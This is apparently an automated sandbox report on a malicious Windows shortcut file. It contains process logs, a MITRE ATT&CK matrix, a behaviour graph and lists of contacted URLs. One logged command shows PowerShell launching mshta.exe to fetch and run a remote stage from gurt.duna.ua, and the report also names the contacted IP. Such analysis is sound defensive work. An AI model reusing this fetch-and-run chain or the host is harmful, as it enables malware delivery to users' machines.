Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1661Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 680Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep count: 1661 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1352Thread sleep count: 680 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3924Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000007.00000002.3289463486.000002131F82F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW \
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3290629653.0000021325053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543063 Sample: sbOq2d6k2t.lnk Startdate: 27/10/2024 Architecture: WINDOWS Score: 68 22 gurt.duna.ua 2->22 28 Windows shortcut file (LNK) starts blacklisted processes 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Windows shortcut file (LNK) contains suspicious command line arguments 2->32 34 2 other signatures 2->34 8 forfiles.exe 1 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 36 Windows shortcut file (LNK) starts blacklisted processes 8->36 14 powershell.exe 7 8->14         started        17 conhost.exe 1 8->17         started        26 127.0.0.1 unknown unknown 11->26 signatures6 process7 signatures8 38 Windows shortcut file (LNK) starts blacklisted processes 14->38 19 mshta.exe 54 14->19         started        process9 dnsIp10 24 gurt.duna.ua 185.68.16.189, 443, 49704, 49705 UKRAINE-ASUA Ukraine 19->24

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sbOq2d6k2t.lnk18%ReversingLabsShortcut.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://schema.org0%URL Reputationsafe
http://gmpg.org/xfn/110%URL Reputationsafe
https://yoast.com/wordpress/plugins/seo/0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
gurt.duna.ua
185.68.16.189
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7false
      		unknown
      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2false
        		unknown
        https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8false
          		unknown
          https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1false
            		unknown
            https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1false
              		unknown
              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2false
                		unknown
                https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2false
                  		unknown
                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2false
                    		unknown
                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2false
                      		unknown
                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5false
                        		unknown
                        https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2false
                          		unknown
                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2false
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://gurt.duna.ua/my-account/lost-password/mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2Fmshta.exe, 00000004.00000002.3290475443.0000013470330000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5lwmshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=15mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5#_?p4mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5Tmshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://gurt.duna.ua/dohovir-oferty/mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://gurt.dua/prmshta.exe, 00000004.00000003.2148804238.00000134703B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148804238.00000134703AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://gurt.duna.ua/ru/optovaia-prodazha-duna/mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://gurt.duna.ua/wp-content/thmshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://gurt.duna.ua/wp-comshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://gurt.duna.ua/help/mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5Emshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://gurt.dumshta.exe, 00000004.00000003.2148804238.00000134703B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148804238.00000134703AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.pngmshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpgmshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5Gmshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2-mshta.exe, 00000004.00000003.2148849104.00000134703A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svgmshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://gurt.duna.ua/wp-admin/admin-ajax.phpmshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://gurt.duna.ua/my-account/orders/mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2:mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideOmshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
